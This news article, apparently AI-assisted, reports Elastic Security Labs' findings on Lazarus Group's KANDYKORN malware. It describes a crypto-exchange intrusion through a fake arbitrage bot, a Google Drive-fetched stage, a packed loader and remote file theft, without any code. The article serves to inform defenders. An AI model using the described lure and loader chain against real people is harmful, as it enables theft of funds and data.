Lazarus Group Exploits New Malware 'KANDYKORN' to Target Crypto Exchanges
Summary:
The North Korean cybercrime syndicate, Lazarus Group, recently deployed a new variety of malware, "KANDYKORN", to breach a crypto exchange, according to Elastic Security Labs. The security firm discovered KANDYKORN after the Lazarus Group members posed as blockchain engineers and tricked the exchange's engineers into downloading an alleged profitable arbitrage bot. The bot, however, was a harmful file that established a connection to an unknown Google Drive account and downloaded additional malicious content. This content included "SUGARLOADER", that could bypass most malware detection systems. Once installed, it downloaded KANDYKORN directly into the device's memory, preparing it to perform various harmful operations. Elastic believes the still-active threat originally occurred in April 2023.
The infamous Lazarus Group has reportedly used an innovative malware variant aiming to breach a crypto exchange, as outlined in an analysis published by Elastic Security Labs on October 31. This new harmful software has been labeled “KANDYKORN” by Elastic, with the loader operation that instigates it in memory dubbed “SUGARLOAD,” owing to its singular ".sld" file extension. The crypto exchange targeted remains undisclosed by Elastic.
In 2023, crypto platforms have been besieged with numerous private-key breaches, predominantly traced back to the notorious North Korean cybercrime syndicate, Lazarus Group.
As for the assault in question, Elastic reports that the Lazarus Group initiated the attack by masquerading as blockchain professionals, luring engineers of the anonymous crypto platform. Establishing contact via Discord, the attackers fraudulently claimed they had created a successful arbitrage bot capable of cashing in on price variations between different crypto exchanges. They persuaded the engineers to download this so-called "bot." Deceptively named files, such as “config.py” and “pricetable.py,” were tucked away in the program's zip folder, lending it the appearance of a genuine arbitrage bot.
The deceptive trap was sprung as the engineers launched the program, activating a “Main.py” file which carried out an array of standard operations while simultaneously running a harmful file known as “Watcher.py.” This file facilitated a connection to an external Google Drive account, pulling content from it to another file named testSpeed.py, which was then run once before being eradicated to shield any evidence.
During the solitary execution of testSpeed.py, the program fetched further content and eventually activated a file Elastic refers to as “SUGARLOADER.” Through the use of a "binary packer," this file was concealed, rendering it largely undetectable by most malware-seeking software. Nonetheless, Elastic uncovered it after suspending the program post-initialization and taking a snapshot of the process' virtual memory. When subjected to VirusTotal malware detection testing, SUGARLOADER came up clean.
Following its infiltration into the computer system, SUGARLOADER synced with an offsite server and downloaded KANDYKORN straight to the device's memory. KANDYKORN is furnished with an array of functions operated by the remote server to conduct diverse harmful operations. Functions such as the command “0xD3” allow the attacker to access a directory's contents on the targeted machine, while “resp_file_down” facilitates the transfer of files from the victim's system to the attacker's.
Elastic estimates that the assault occurred in April of 2023, and strongly suspects ongoing malicious activity with the following statement, “This threat is still active and the tools and techniques are being continuously developed.”
Over the course of 2023, a wave of attacks has struck centralized crypto exchanges and apps. Victims of these invasions range from Alphapo, CoinsPaid, Atomic Wallet, and Coinex to Stake, among others. A majority of these assaults appeared to revolve around the extraction of a private key from the victim’s device, subsequently used to redirect client cryptocurrency to the attacker's designated address. The tainted Lazarus Group has been directly implicated in the Coinex and Stake heists, among others, by the US Federal Bureau of Investigation (FBI).
Published At
11/1/2023 9:00:00 PM
Disclaimer: Algoine does not endorse any content or product on this page. Readers should conduct their own research before taking any actions related to the asset, company, or any information in this article and assume full responsibility for their decisions. This article should not be considered as investment advice. Our news is prepared with AI support.
Do you suspect this content may be misleading, incomplete, or inappropriate in any way, requiring modification or removal?
We appreciate your report.